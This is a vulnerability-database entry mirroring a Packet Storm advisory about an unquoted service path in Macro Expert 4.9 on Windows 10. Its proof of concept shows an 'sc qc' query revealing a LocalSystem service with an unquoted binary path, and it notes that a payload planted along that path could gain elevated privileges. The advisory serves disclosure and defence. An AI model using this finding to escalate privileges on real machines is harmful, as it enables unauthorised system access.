Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMurat DemirciPACKETSTORM:172740
HistoryJun 06, 2023 - 12:00 a.m.

Macro Expert 4.9 Unquoted Service Path

2023-06-0600:00:00
Murat Demirci
packetstormsecurity.com
125
macro expert
unquoted service path
privilege escalation
windows 10
vulnerability
JSON
`# Exploit Title: Macro Expert 4.9 - Unquoted Service Path  
# Date: 04/06/2023  
# Exploit Author: Murat DEMIRCI  
# Vendor Homepage: http://www.macro-expert.com/  
# Software Link: http://www.macro-expert.com/product/gm_setup_4.9.exe  
# Version: 4.9  
# Tested on: Windows 10  
  
# Proof of Concept :  
  
C:\Users\Murat>sc qc "Macro Expert"  
[SC] QueryServiceConfig SUCCESS  
  
SERVICE_NAME: Macro Expert  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : c:\program files (x86)\grasssoft\macro expert\MacroService.exe  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : Macro Expert  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem  
  
# If a malicious payload insert into related path and service is executed in anyway, this can gain new privilege access to the system and perform malicious acts.  
  
`
JSON